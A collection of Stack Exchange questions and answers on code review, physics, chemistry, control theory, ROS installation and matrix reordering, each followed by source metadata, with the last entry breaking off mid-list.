After the second assignment, the same variable has an array value.
This quickly gets confusing.
A type-safe language would not let you do this, for your own good.
I suggest to adopt the habit of not reusing a variable with multiple types,
even when the language allows it.
Another issue with variables is in operateOnEntry,
userEntry and currentEntry are used,
but they actually point to the same value.
This is both extremely confusing and extremely error-prone.
How is my overall readability? Is what i'm writing even clear, or is it hard to decipher?
I find it hard to understand, for several reasons:
The calculator logic and the UI are mixed together
The names don't describe themselves well
There are many global variables (ideally there should be none), and global state is always hard to follow
Are my comments helpful or redundant?
I haven't found a helpful comment,
but I haven't tried to understand the entire code.
Since you ask, here are some examples to improve.
This comment states the obvious:
//first we restrict input length to 17
if (currentArea.textContent.length > 17 || totalArea.textContent.length > 17) {
This comment is actually wrong, the function returns non-array values in some cases.
function filterUserInput(userInput) {
//this function converts the user input into an array
Incorrect comments cause harm.
It's best when the code can speak for itself without comments.
It's not always possible, but a good goal to strive for. | {
"domain": "codereview.stackexchange",
"id": 31621,
"tags": "javascript, beginner, calculator"
} |
Problem with Deriving work done by gravitational force and gravitational potential energy from the first principles | Question: Suppose we have a system with Two point masses of mass $M$ and mass $m$. And we want to derive Work done. Lets say M is fixed or $M>>m$. Initially assume mass m is at rest at a distance of $a$ from $M$ and after some time it reaches $b$. And we want to calculate work done. Since magnitude of Gravitational Force is $\frac{GMm}{r^2}$ and displacement of $m$ is towards the big mass so Force and dissplacement are in same direction so work done should we positive. But if we calculate $\int_a^b F\cos(\theta) \,dx$ you get a different answer its negative. Since $b<a$ (Gravity is a repulsive force and after some time distance decreases between masses final distance is b and initial is a by definition) and gravitational force is just $\int_a^b \frac{GMm}{r^2} \,dr$. This has to be right because both displacement and Force are in same direction so Force multiplied by dr is as I showed above. Now when you calculate this integral you get $GMm(\frac{1}{a}-\frac{1}{b})$ which is clearly negative. What am I doing wrong. If you continue with this working to calculate potential energy you get it as positive which is also wrong. whats the mistake. The same reasoning I did for spring force and other phenonmenon its correct but gravity something wrong is happening what is it.
Answer: One way to look at what is going on is that when you do an integral like
$$
\int_a^b f(r) dr
$$
with $a>b$, then $dr$ is negative. More precisely, if you convert this integral into a Riemann sum,
$$
\sum_{i=1}^N f(r_i) \Delta r
$$
with $r_1=a>r_N=b$, then $\Delta r=\frac{b-a}{N}<0$.
So let's go back to how we would do the dot product to get to the integral for work. To do this carefully, we need a vector expression for the force (not just the magnitude). We introduce a unit vector $\hat{e}_r$ that points radially outward. Then
$$
\vec{F} = -\frac{GMm}{r^2}\hat{e}_r
$$
since the force points radially inward.
Now we come to the displacement vector -- this is the tricky part. What you would like to say is that the displacement is radially inward, so that
$$
d\vec{r} = -\hat{e}_r dr \ \ \ {\rm (WRONG)}
$$
However, this is wrong, because:
We know $-\hat{e}_r$ points radially inward
We know that $dr$ is negative, by the argument above.
Therefore, combining the above two points, $-\hat{e}_r dr$ points radially outward, but we know that the actual displacement $d\vec{r}$ must point radially inward.
Therefore, the correct equation here is
$$
d\vec{r} = {\color{red} +} \hat{e}_r dr
$$
With this substituion, we get
\begin{eqnarray}
W = \int \vec{F} \cdot d\vec{r} = - (\hat{e}_r \cdot \hat{e}_r) \int_a^b \frac{GMm}{r^2} dr = {\color{red}-} \int_a^b \frac{GMm}{r^2} dr = GMm \left(\frac{1}{b}-\frac{1}{a}\right) > 0
\end{eqnarray}
as expected.
Another way to say this, which is perhaps less error prone, is that the displacement is
$$
d\vec{r} = \hat{e}_r |dr|
$$
You can avoid having to worry about the sign, if you remember that $|dr|$ means you should always choose the limits of integration to go from the smaller $r$ value to the larger $r$ value, so that $dr>0$ and $|dr|=dr$. | {
"domain": "physics.stackexchange",
"id": 100471,
"tags": "newtonian-mechanics, forces, newtonian-gravity, work, integration"
} |
String validation based on multiple criteria | Question: I had me a code challenge and I was thinking: is there a way to make this more efficient and short? The challenge requires me to scan a string and ...
In the first line, print True if it has any alphanumeric characters. Otherwise, print False.
In the second line, print True if it has any alphabetical characters. Otherwise, print False.
In the third line, print True if it has any digits. Otherwise, print False.
In the fourth line, print True if it has any lowercase characters. Otherwise, print False.
In the fifth line, print True if has any uppercase characters. Otherwise, print False.
Below is my approach :
def func_alnum(s):
for i in s:
if i.isalnum():
return True
return False
def func_isalpha(s):
for i in s:
if i.isalpha():
return True
return False
def func_isdigit(s):
for i in s:
if i.isdigit():
return True
return False
def func_islower(s):
for i in s:
if i.islower():
return True
return False
def func_isupper(s):
for i in s:
if i.isupper():
return True
return False
if __name__ == '__main__':
s = input()
s=list(s)
print(func_alnum(s))
print(func_isalpha(s))
print(func_isdigit(s))
print(func_islower(s))
print(func_isupper(s))
It feels like I made a mountain out of a molehill. But I would defer to your opinions on efficiency and shortness before I live with that opinion.
Answer: Your five functions only differ by the predicate used to test each character, so you could have a single one parametrized by said predicate:
def fulfill_condition(predicate, string):
for character in string:
if predicate(character):
return True
return False
if __name__ == '__main__':
s = input()
print(fulfill_condition(str.isalnum, s))
print(fulfill_condition(str.isalpha, s))
print(fulfill_condition(str.isdigit, s))
print(fulfill_condition(str.islower, s))
print(fulfill_condition(str.isupper, s))
Note that you don't need to convert the string to a list for this to work, strings are already iterables.
Now we can simplify fulfill_condition even further by analysing that it applies the predicate to each character and returns whether any one of them is True. This can be written:
def fulfill_condition(predicate, string):
return any(map(predicate, string))
Lastly, if you really want to have 5 different functions, you can use functools.partial:
from functools import partial
func_alnum = partial(fulfill_condition, str.isalnum)
func_isalpha = partial(fulfill_condition, str.isalpha)
func_isdigit = partial(fulfill_condition, str.isdigit)
func_islower = partial(fulfill_condition, str.islower)
func_isupper = partial(fulfill_condition, str.isupper) | {
"domain": "codereview.stackexchange",
"id": 35206,
"tags": "python, python-3.x, strings"
} |
Is there a more optimized way for this MySql Query | Question: with below query i'm getting the results that i want but it's quite slow taking nearly 0.2 seconds (on an i5 machine). Is there a more optimized way to get the same results.
Basically this query fetches the last 20 rows in the table and shows only one row per yzr.name and orders by yzr.favorite_count
SELECT gzt.name AS gazete,
yz.*,
yzr.name,
yzr.gazete_id,
yzr.yazar_image_link,
yzr.favorite_count,
DATE_FORMAT(tarih,'%d.%m.%Y') As formatted_tarih
FROM yazar AS yzr
INNER JOIN yazi yz ON yzr.id=yz.yazar_id
INNER JOIN gazete gzt ON yzr.gazete_id = gzt.id
GROUP By yzr.name
ORDER BY yzr.favorite_count DESC
LIMIT 20 OFFSET 0
Answer: As you have no range specific functions applied in the SELECT clause I don't understand why you need the GROUP BY clause.
The expression is way to simple to be optimized (its hard to see how you can go wrong).
For any optimization advice you will need to provide the table definitions and an explanation of the Normal Form the data has been decomposed to. Optimization of SQL queries usually lies in the table structure and not decomposing the data to full actualized third Normal Form. | {
"domain": "codereview.stackexchange",
"id": 3609,
"tags": "optimization, mysql, sql"
} |
Project Euler problem 23 - non-abundant sums | Question: I present my solution for Project Euler problem 23 written in Python (2.7).
The problem statement is:
A perfect number is a number for which the sum of its proper divisors
is exactly equal to the number. For example, the sum of the proper
divisors of 28 would be 1 + 2 + 4 + 7 + 14 = 28, which means that 28
is a perfect number.
A number whose proper divisors are less than the number is called
deficient and a number whose proper divisors exceed the number is
called abundant.
As 12 is the smallest abundant number, 1 + 2 + 3 + 4 + 6 = 16, the
smallest number that can be written as the sum of two abundant numbers
is
24. By mathematical analysis, it can be shown that all integers greater than 28123 can be written as the sum of two abundant numbers.
However, this upper limit cannot be reduced any further by analysis
even though it is known that the greatest number that cannot be
expressed as the sum of two abundant numbers is less than this limit.
Find the sum of all the positive integers which cannot be written as
the sum of two abundant numbers.
I have done everything to my knowledge to make the code run as fast as possible. It takes about 600 milliseconds on my machine.
It is one of the first times that I actually put the else part of the for statement to use. Using any alternatively turned out to be about 1.5× as slow.
SMALLEST_ABUNDANT = 12
# largest number for which we have to test if it can be expressed as the
# sum of two abundant numbers
MAX_TEST_SUM_OF_TWO_ABUNDANT = 28123
# largest number for which we have to know if it is abundant
MAX_TEST_ABUNDANT = MAX_TEST_SUM_OF_TWO_ABUNDANT - SMALLEST_ABUNDANT
# largest possible divisor that we have to consider
MAX_DIVISOR = MAX_TEST_ABUNDANT / 2
from collections import defaultdict
def solve_euler23():
"""Return the sum of all positive integers which cannot be written
as the sum of two abundant numbers.
"""
# mapping from a number to the set of its proper divisors (i.e.,
# excluding the number itself)
divisors = defaultdict(set)
for divisor in range(1, MAX_DIVISOR+1):
for number in range(2*divisor, MAX_TEST_ABUNDANT+1, divisor):
divisors[number].add(divisor)
def is_abundant(number):
return sum(divisors[number]) > number
abundant_numbers = sorted(filter(is_abundant, divisors))
# make a set so that membership can be tested efficiently
abundant_numbers_set = set(abundant_numbers)
impossible_sum_of_two_abundant_numbers = []
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
for abundant in abundant_numbers:
if number - abundant in abundant_numbers_set:
break # is the sum of two abundant numbers
else:
impossible_sum_of_two_abundant_numbers.append(number)
return sum(impossible_sum_of_two_abundant_numbers)
if __name__=='__main__':
print solve_euler23()
My questions are:
Is there a better algorithm?
Did I overlook something which would make the implementation of my chosen algorithm more efficient?
Can I make the code shorter or clearer?
Answer: 1. Sieving for sums
The computation of the sum of divisors can be improved using a bit of math. Let's call the sum-of-divisors function \$σ\$, and consider \$σ(60)\$: $$ σ(60) = 1 + 2 + 3 + 4 + 5 + 6 + 10 + 12 + 15 + 20 + 30 + 60. $$ Collect together the divisors by powers of 2: $$ \eqalign{σ(60) &= (1 + 3 + 5 + 15) + (2 + 6 + 10 + 30) + (4 + 12 + 20 + 60) \\ &= (1 + 2 + 4)(1 + 3 + 5 + 15) \\ &= (1 + 2 + 4)σ(15)}. $$ Then do the same thing for \$σ(15)\$, collecting together the divisors by powers of 3: $$ \eqalign{σ(15) &= (1 + 5) + (3 + 15) \\ &= (1 + 3)(1 + 5) \\ &= (1 + 3)σ(5)}. $$ And so on, getting \$σ(60) = (1 + 2 + 4)(1 + 3)(1 + 5)\$. In general, if we can factorize \$n\$ as: $$ n = 2^a3^b5^c\dotsm $$ then $$ σ(n) = (1 + 2 + \dotsb + 2^a)(1 + 3 + \dotsb + 3^b)(1 + 5 + \dotsb + 5^c)\dotsm $$ These multipliers occur many times, for example \$(1 + 2 + 4)\$ occurs in the sum of divisors of every number divisible by 4 but not by 8, so it's most efficient to sieve for the sums of many divisors at once, like this:
def all_sum_divisors(n):
"""Return a list of the sums of divisors for the numbers below n.
>>> all_sum_divisors(10) # https://oeis.org/A000203
[1, 1, 3, 4, 7, 6, 12, 8, 15, 13]
"""
result = [1] * n
for p in range(2, n):
if result[p] == 1: # p is prime
p_power, last_m = p, 1
while p_power < n:
m = last_m + p_power
for i in range(p_power, n, p_power):
result[i] //= last_m
result[i] *= m
last_m = m
p_power *= p
return result
2. Review
I would change the signature of the function as follows:
def solve_euler23(n=28124):
"""Return the sum of all positive integers below n which cannot be
written as the sum of two abundant numbers."""
The reason for doing this is to make it possible to test the function on small instances: for example, you could test the claim in the problem statement (that 24 is the smallest number that cannot be written etc.), by running solve_euler23(24) and checking that it returns \$ \sum_{1≤i<24}i=276 \$, and then running solve_euler23(25) and checking that it returns the same result.
The division operator / returns a float in Python 3, so for portability it would be worth writing:
MAX_DIVISOR = MAX_TEST_ABUNDANT // 2
The efficiency gain of avoiding computing the sum of divisors of the numbers up to SMALLEST_ABUNDANT (12) is negligible, and it deprives you of the chance to check that your sum-of-divisors algorithm is correct on small numbers (for example, an off-by-one error might lead it to deduce that 6 is abundant, but if you started at 12 you might have trouble spotting the bug).
The question only asks for the sum of the positive integers which cannot be written as the sum of two abundant numbers, so it's not necessary to keep a list of the numbers themselves.
When looking for sums adding up to number, the code tests every abundant number:
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
for abundant in abundant_numbers:
if number - abundant in abundant_numbers_set:
break
but we only need to test abundant numbers up to number // 2 (if two abundant numbers add up to number, then one of them will be no more than number // 2). We could test for this in the loop:
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
for abundant in abundant_numbers:
if number - abundant in abundant_numbers_set:
break
else if abundant >= number // 2:
impossible_sum_of_two_abundant_numbers.append(number)
break
but because abundant_numbers is sorted, we can quickly calculate how far along this list we need to go, using bisect.bisect and itertools.islice:
for number in range(1, MAX_TEST_SUM_OF_TWO_ABUNDANT+1):
for abundant in islice(abundant_numbers,
bisect(abundant_numbers, number // 2)):
if number - abundant in abundant_numbers_set:
break
3. Revised code
from bisect import bisect
from itertools import islice
def solve_euler23(n=28124):
"""Return the sum of all positive integers below n which cannot be
written as the sum of two abundant numbers.
"""
sum_divisors = all_sum_divisors(n)
abundant = [i for i in range(1, n) if sum_divisors[i] > 2 * i]
abundant_set = set(abundant)
def unsums():
for i in range(1, n):
for j in islice(abundant, bisect(abundant, i // 2)):
if i - j in abundant_set:
break
else:
yield i
return sum(unsums())
I find this is about three times as fast as the code in the original post. | {
"domain": "codereview.stackexchange",
"id": 13831,
"tags": "python, performance, programming-challenge, python-2.x"
} |
two-sum algorithm | Question: Can someone help me in optimizing the code here?
This is the original question
Given an array of integers, return indices of the two numbers such
that they add up to a specific target.
You may assume that each input would have exactly one solution, and
you may not use the same element twice.
Question link: https://leetcode.com/problems/two-sum/
/**
* @param {number[]} nums
* @param {number} target
* @return {number[]}
*/
var twoSum = function(nums, target) {
const hashMapArray = {}
for (let i=0; i<nums.length; i++) {
const num = nums[i]
for (let index in hashMapArray) {
if (hashMapArray[index] + num === target) {
return [index, i]
}
}
hashMapArray[i] = num
}
return []
}
Frankly, I was expecting my code to be optimized but then this what I got as a result and I was kinda heartbroken
How can I make it better?
Results:
Answer: I can not work out why you are iterating the mapped values. The point of mapping the values is so you do not need to search them.
Rather than use an object to map the values you can also use a Map, though there is not much of a performance gain.
The following at most will only iterate each item once and thus save you a significant amount of CPU time.
function twoSum(nums, target) {
const map = new Map(), len = nums.length;
var i = 0;
while (i < len) {
const num = nums[i], val = target - num;
if (map.has(val)) { return [i, map.get(val)] }
map.set(num, i);
i++;
}
return [];
}
To save memory you can use the following. It will be slower than the above function however it will still be a lot faster than your function as the inner loop only search from the outer loops current position.
function twoSum(nums, target) {
const len = nums.length;
var i = 0, j;
while (i < len) {
const val = target - nums[i];
j = i + 1;
while (j < len) {
if (nums[j] === val) { return [i, j] }
j++;
}
i++;
}
return [];
} | {
"domain": "codereview.stackexchange",
"id": 36476,
"tags": "javascript, performance, programming-challenge, time-limit-exceeded"
} |
How can metals absorb light? | Question: We're told that semiconductors have a bandgap and photons of an energy greater than the bandgap can be absorbed, exciting electrons from the valence band to conduction band. This therefore defines their absorption spectrum.
However, metals do not have a bandgap as the uppermost energy band is half-filled. What, therefore, defines their absorption spectrum please? I've read about free-carrier absorption - is this related?
Thanks
Answer: In a metal light will interact with both the electrons in the conduction band and with the valance electrons of the metal lattice.
If the frequency is above the so-called plasma frequency the conduction band electrons can be considered free (very few collisions between oscillations). The electrons simply re-emit the light which makes the metal transparent. However, at lower frequencies like in the visible range the conduction band electrons will collide with the lattice much faster than the period of the wave and will absorb the energy without being able to re-emit energy. Basically, due to the lattice collisions the electrons can not follow the incoming light. This absorption prevents the light to penetrate the metal.
The effect of strong absorption somewhat counter intuitively leads to reflection. Because the waves do not penetrate deeply not many of the conduction electrons see the incoming wave and not that much overall energy is absorbed. Most of the energy is reflected by the first few layers of metal atoms in the lattice with a spectrum that depends on the scattering properties of these particular metals atoms. | {
"domain": "physics.stackexchange",
"id": 25158,
"tags": "optics, metals, absorption"
} |
In the context of transfer functions, what is the relationship between the terms "proper", "causal", and "realizable"? | Question: I am thinking about these terms in the context of linear control.
A transfer function is proper if the degree of the numerator is not greater than the degree of the denominator. I've read often that improper transfer functions are "not causal". I also often see the word "unrealizable" used often in this context.
If a control transfer function I've designed is improper, does that mean it is "causal" and/or "unrealizable"? What is the difference between these terms? What do they mean in practice?
Answer: Causality is a necessary condition for realizability. Stability (or, at least, marginal stability) is also important for a system to be useful in practice.
For linear time-invariant (LTI) systems, which are fully characterized by their transfer function, we get realizability constraints on the transfer function. For continuous-time LTI systems, if we work at frequencies for which the lumped element model is valid, we require the system's transfer function to be rational for the system to be realizable. Also for discrete-time LTI systems we require rationality of the transfer function, which implies that the system can be realized by adders, multipliers, and delay elements.
For an LTI system to be causal and stable, its poles must lie in the left half-plane (for continuous-time systems), or inside the unit circle (discrete-time systems). From this it follows that the rational transfer function of an LTI system must be proper, otherwise you would get one or more poles at infinity, causing the system to be unstable (or non-causal). | {
"domain": "dsp.stackexchange",
"id": 4878,
"tags": "linear-systems, control-systems, causality"
} |
Parsing: Entity Classes to DTO | Question: I'm building a GWT application for GAE, using JDO for Datastore access. I use and Entity class for data mapping, so it contains lots of Persistence annotations:
@PersistenceCapable(identityType = IdentityType.APPLICATION)
public class AppointmentEntity implements Serializable {
private static final long serialVersionUID = 1L;
@PrimaryKey
@Persistent(valueStrategy = IdGeneratorStrategy.IDENTITY)
private Long id;
@Persistent
private String firstName;
@Persistent
private String lastName;
@Persistent
private String DNI;
@Persistent
private Date appointmentDate;
@Persistent
private String attendant;
@Persistent
private String treatment;
@Persistent
private String details;
@Persistent
private Date nextAppointment;
@Persistent(serialized = "true")
private DownloadableFile file;
//getters and setters...
Because of GWT and JDO nature, i can't use this Entity classes in my presentation layer; so there's a need of passing Entity Object attributes to the corresponding DTO, which is a POJO that has the same attributes of the Entity class:
public class AppointmentDTO implements Serializable {
private static final long serialVersionUID = 1L;
private Long id;
private String firstName;
private String lastName;
private String DNI;
private Date appointmentDate;
private Date nextAppointmentDate;
private String attendant;
private String treatment;
private String details;
//getters and setters...
To do the Job of mapping attributes i make a Wrapper class that handles it, but it doesn't feel quite right to me. Does anyone have a better approach?
public class AppointmentWrapper {
private List<AppointmentEntity> entitiesList;
public AppointmentWrapper(List<AppointmentEntity> appointmentEntities) {
entitiesList = appointmentEntities;
}
public List<AppointmentDTO> getDTOList() {
List<AppointmentDTO> dtoList = new ArrayList<AppointmentDTO>();
for (AppointmentEntity entity : entitiesList) {
AppointmentDTO dto = new AppointmentDTO();
dto.setId(entity.getId());
dto.setFirstName(entity.getFirstName());
dto.setLastName(entity.getLastName());
dto.setAppointmentDate(entity.getAppointmentDate());
dto.setNextAppointmentDate(entity.getNextAppointment());
dto.setAttendant(entity.getAttendant());
dto.setDetails(entity.getDetails());
dto.setDNI(entity.getDNI());
dto.setTreatment(entity.getTreatment());
dtoList.add(dto);
}
return dtoList;
}
}
Answer: There is this concerning GWT and GAE objects. If that doesn't work for you, I would rather have a class of public static methods that does the conversions rather than sticking it into some kind of "wrapper class" that contains object states. For example,
public final class JDOEntityUtil {
static public AppointmentDTO toDTO(AppointmentEntity entity) {
AppointmentDTO dto = new AppointmentDTO();
dto.setId(entity.getId());
dto.setFirstName(entity.getFirstName());
dto.setLastName(entity.getLastName());
dto.setAppointmentDate(entity.getAppointmentDate());
dto.setNextAppointmentDate(entity.getNextAppointment());
dto.setAttendant(entity.getAttendant());
dto.setDetails(entity.getDetails());
dto.setDNI(entity.getDNI());
dto.setTreatment(entity.getTreatment());
return dto;
}
static public AppointmentEntity toEntity(AppointmentDTO dto) {
AppointmentEntity entity = new AppointmentEntity();
entity.setId(dto.getId()); /* or however you want to construct this */
entity.setFirstName(dto.getFirstName());
entity.setLastName(dto.getLastName());
entity.setAppointmentDate(dto.getAppointmentDate());
entity.setNextAppointmentDate(dto.getNextAppointment());
entity.setAttendant(dto.getAttendant());
entity.setDetails(dto.getDetails());
entity.setDNI(dto.getDNI());
entity.setTreatment(dto.getTreatment());
return entity;
}
} | {
"domain": "codereview.stackexchange",
"id": 1418,
"tags": "java"
} |
Why would Google's map of areas affected by Hurricane Harvey have advisories for the west coast and other far away areas? | Question:
What behavior of this hurricane would lead to advisories for the west coast and even parts of Canada and Alaska, when the hurricane is in the South?
I have little experience in meteorology or any of the earth sciences really, so I am interested in how this would affect the weather or other conditions far away from where the hurricane is severe.
Answer: It seems like there is more than just a hurricane going on. According to the National Weather Service there are excessive heat advisories, gale warnings, etc. | {
"domain": "earthscience.stackexchange",
"id": 1190,
"tags": "meteorology, tropical-cyclone, extreme-weather"
} |
Thermodynamics at absolute temperature | Question: Assume I have kept a single molecule in vacuum and in absolute zero (0 K) temperature. There is no energy left in the particle, and hence any type of motion is absent.
Now, what happens when I increase the temperature of that system? Does the molecule start to move? Does the energy increase?
What does temperature even mean in vacuum?
I don't know I'm asking a good question, but this troubles me a lot.
Answer: The situation you described is not a vacuum because it has a single molecule in it, so what you're asking about is how the concept of temperature applies to an isolated molecule.
First, the idea that you can start at absolute zero even with a single molecule is not consistent because there will always be fluctuations/movement possible in the ground state of a quantum system (the zero point energy or ZPE). The cleanest example of this is the quantum harmonic oscillator: a particle in the ground state has an average position of zero ($\langle x \rangle = 0$), but the fluctuations are greater than zero ($\langle x^2 \rangle > 0$). Let's think about this in terms of the uncertainty principle. The uncertainty principle is given by $\Delta p\Delta x \geq \hbar /2$ where $\Delta x = \sqrt{\langle x^2 \rangle - \langle x \rangle^2}$ and $\Delta p = \sqrt{\langle p^2 \rangle - \langle p \rangle^2}$. Because $\langle x^2 \rangle >0$ and $\langle x \rangle = 0$, we can see that the uncertainty in the momentum is also non-zero. As we know, the kinetic energy is $p^2 / 2m$, so our energy uncertainty is non-zero as well.
Second, and onto the main point of your question, you can certainly define a concept of temperature with only one molecule. Consider that even a single molecule has many different energy levels (i.e. electronic, vibrational, and rotational degrees of freedom are all available). The partition function for our system is still defined as $Z = \sum_i \exp{\left(-\frac{E_i}{k_bT}\right)}$ where $E_i$ is the energy of the $i$th state.(See Note) So, if we start very near absolute zero we will see only contributions from the ground state, but as we increase the temperature of the system we will observe non-zero probabilities of populating excited states. Nothing is broken about the concept of temperature in this situation, the energy scales are just considerably smaller than those in an ideal gas.
Note:
Your initial reaction to applying thermodynamic principles to a single molecule might be to think that it doesn't apply because we only have one molecule and not an ensemble. However, within the density matrix formulation of statistical mechanics, the quantum uncertainty of a system is entirely indistinguishable from the statistical uncertainty of a system. | {
"domain": "chemistry.stackexchange",
"id": 11317,
"tags": "thermodynamics"
} |
Crystal field splitting of other orbitals | Question: According to crystal field theory (CFT), $\mathrm{d}$-orbitals of central metal atom splits due to non uniform repulsion of ligands around the metal atom. Why isn't $\mathrm{p}$-orbital splitting discussed?
Argument: As in case of square planar complexes $\mathrm{(dsp^2)},$ $\mathrm{p}$-orbitals are involved which are facing different conditions of repulsion. So, $\mathrm{p}_{xy}$ must have higher energy than $\mathrm{p}_{xz}$ or $\mathrm{p}_{yz}.$ This happens in case of trigonal pyramidal structure too.
Answer:
According to Crystal Field Theory, d-orbitals of central metal atom splits due to non uniform repulsion of ligands around the metal atom. Why isn't p-orbital splitting discussed?
To be blunt, the reason nobody mentions p-orbital splitting or non-splitting is that neither the teacher nor the learner has ever understood the crystal field theory properly in its true depth (including myself). They just propagate what they saw in standard textbooks, repeat the same in class, the students pass never to see CFT again. The story ends. If that student ever becomes a teacher, the story continues.
You are mixing apples and oranges. Crystal field theory has nothing to do with hybridization. The original work of Hans Bethe, the man behind crystal field theory, wrote a 72-paged highly theoretical paper in Annalen der Physik in German. The translations are available and I quote the abstract where he does clarify what happens to p-orbitals. How many can claim that that they read this paper completely before teaching CFT. I cannot. The abstract clarifies your misconception.
The influence of an electric field of prescribed symmetry (crystalline field) on an atom is treated wave - mechanically . The terms of the atom split up in a way that depends on the symmetry of the field and on the angular momentum I (or J) of the atom . No splitting of s terms occurs , and p terms are not split up in fields of cubic symmetry . For the case in which the individual electrons of the atom can he treated separately ( interaction inside the atom turned off) the elgenfunctions of zeroth approximation are stated for every term in the crystal; from these there follows a concentration of the electron density along the symmetry axes of the crystal which is characteristic of the term. - The magnitude of the term splitting is of the order of some hundreds of cm-1. - For tetragonal symmetry, a quantitative measure of the departure from cubic symmetry can be defined, which determines uniquely the most stable arrangement of electrons In the crystal. | {
"domain": "chemistry.stackexchange",
"id": 13633,
"tags": "inorganic-chemistry, coordination-compounds, orbitals, crystal-field-theory"
} |
Why does ROS installation fails on 64bit Linux | Question:
Hi,
So my goal is to install ROS and Matlab on a Ubuntu 14.04 laptop, simple right? I started with a fresh installation of Ubuntu 14.04 and went ahead to install ROS, I followed the installation instructions in the ROS wiki but I always get the "ROS-indigo-desktop-full depends on ROS-indigo-symantics..." and other dependencies.
I googled this issue and tried every possible scenario or suggestion but there wasn't much help, though I figured it is related to my Ubuntu being 64bit, so I decided to erase everything and install ubuntu 14.04 32bit, after I did that ROS amazingly installed without a single problem and ran smoothly.
BUT then I discovered that Matlab can only install on a 64bit linux! I tried to find a workaround but with no luck, so back to square one.
I erased everything and installed Ubuntu 14.04 64bit, and back to the dependency hell!!! ROS does not install and no solution for that on the internet.
It's been 10 days now and I still cannot install ROS and Matlab together, I would appreciate any help please.
Originally posted by Amjadov on ROS Answers with karma: 16 on 2014-12-24
Post score: 0
Original comments
Comment by Andromeda on 2014-12-25:
I'm pretty sure you did the installation right, but in my 64 bit run both: ROS and Matlab. I haven't done nothing special, just followed the instruction on ROS website. Here my Xubuntu 14.04
Linux YE-166 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linu
Comment by Amjadov on 2014-12-25:
It installed on the same laptop on Ubuntu 32bit smoothly without any problems, but on 64 bit it doesn't.
Btw I also tried to install it on a VM running 64bit Lubuntu but I got the same problem.
Comment by Andromeda on 2014-12-26:
Did you install a desktop version of your Ubuntu distro?
I never had a problem to install 64bit
Answer:
Thanks guys for the help.
I finally solved it! it turned out that after I installed Ubuntu 14.04 64bit, somehow I upgraded my version to 14.10 Utopic, and this version of ubuntu is not compatible with ROS.
I re-installed Trusty and everything went fine.
Originally posted by Amjadov with karma: 16 on 2014-12-25
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by Andromeda on 2014-12-28:
check your answer as accepted | {
"domain": "robotics.stackexchange",
"id": 20430,
"tags": "ros, installation, dependencies"
} |
How can I restructure matrices to have non-zero elements close to the diagonal? | Question: I have a matrix $C \in \mathbb{N}^{n \times n}$. Semantically, it is a confusion matrix where the element $c_{ij}$ denotes how often members of class $i$ are predicted by a given classifier as members of class $j$.
The order of elements does not matter, but $c_{ii}$ has to be the correct predction of class $i$. So for any given matrix $C$ you can swap columns if you swap the same rows.
How can I order the classes $1, \dots, n$ so that the biggest elements are close to the diagonal?
I thought one might pose this as an optimization problem, e.g. minimize
$$\sum_{i = 1}^n \sum_{j=1}^n C_{ij} \cdot {|i-j|}$$
How could I minimize this?
Code and example
I've already visualized a $369 \times 369$ matrix without any optimization. The confuscation matrix as JSON file and the code are here.
Without modification, you get a score of 303535 for:
This looks as if there could be some improvement. A quick first thought was to just randomly swap rows. Letting this run for $10^4$ steps (~5 minutes) leads to a score of 82552 and a visualization which looks a bit cleaner:
Doing this, I realized that my score might also need some improvement. I instead of moving elements to the diagonal, it would be nice if big blocks within the matrix would only contain zeros.
The total number of possibilities to arrange the items in $C$ is equal to the number of permutations of a list of length $n$ and hence it is $n!$. Hence for $369$ classes it is already $369! \approx 10^{788}$ - too much to brute force.
See also
My similar question on datascience.SE
Answer: The random swapping approach (simulated annealing with extremely low temperature) yields to a score of 64496 (20 minutes or so with Python and seed 0, ~60s with C++ and playing with seeds by a friend -.-). The permutation is
[213, 201, 367, 34, 368, 174, 249, 193, 159, 275, 225, 276, 194, 300, 191, 362, 113, 230, 158, 5, 4, 16, 352, 126, 265, 49, 224, 139, 187, 221, 228, 192, 156, 205, 204, 203, 241, 208, 214, 166, 67, 40, 52, 283, 124, 354, 133, 152, 173, 206, 235, 231, 237, 223, 217, 138, 118, 277, 361, 269, 344, 98, 258, 251, 30, 119, 122, 339, 309, 240, 245, 26, 226, 242, 232, 218, 110, 172, 86, 282, 297, 137, 21, 146, 62, 29, 293, 189, 171, 210, 84, 250, 136, 3, 304, 335, 154, 292, 78, 11, 266, 116, 164, 129, 148, 144, 195, 327, 306, 337, 9, 47, 168, 120, 128, 259, 261, 323, 254, 121, 200, 183, 256, 246, 85, 72, 305, 77, 76, 255, 336, 55, 46, 89, 73, 341, 100, 294, 145, 163, 87, 37, 185, 199, 15, 313, 88, 268, 264, 273, 69, 59, 44, 2, 106, 303, 82, 149, 326, 197, 279, 111, 38, 366, 57, 329, 68, 340, 257, 334, 93, 295, 286, 353, 365, 298, 285, 364, 91, 92, 90, 316, 252, 19, 165, 342, 125, 274, 176, 143, 239, 288, 95, 96, 324, 325, 28, 212, 253, 81, 79, 80, 318, 94, 299, 71, 291, 64, 132, 23, 278, 338, 308, 160, 7, 115, 247, 347, 147, 271, 188, 281, 272, 280, 155, 35, 349, 157, 177, 180, 202, 108, 350, 345, 97, 51, 141, 284, 355, 179, 42, 33, 70, 99, 45, 109, 178, 181, 103, 207, 220, 102, 211, 209, 196, 127, 41, 346, 351, 359, 320, 311, 13, 43, 287, 328, 357, 83, 310, 12, 161, 135, 131, 360, 39, 302, 1, 322, 123, 167, 6, 117, 31, 330, 356, 74, 75, 151, 104, 262, 289, 296, 140, 101, 236, 312, 343, 150, 348, 56, 234, 27, 14, 114, 331, 260, 314, 17, 54, 321, 105, 263, 130, 20, 186, 190, 63, 22, 162, 134, 363, 333, 301, 0, 169, 170, 175, 10, 112, 317, 61, 50, 248, 18, 315, 60, 32, 222, 244, 290, 48, 36, 307, 184, 58, 233, 238, 229, 227, 219, 153, 66, 319, 332, 358, 25, 53, 270, 182, 8, 216, 65, 24, 267, 107, 215, 142, 198, 243]
which corresponds to the symbol classes
['\blacktriangleright', '\nvDash', '\AE', '7', '\guillemotleft', '\perp',
'\bot', '\therefore', '\boxtimes', '\vdots', '\Leftarrow',
'\ddots', '\because', '\iddots',
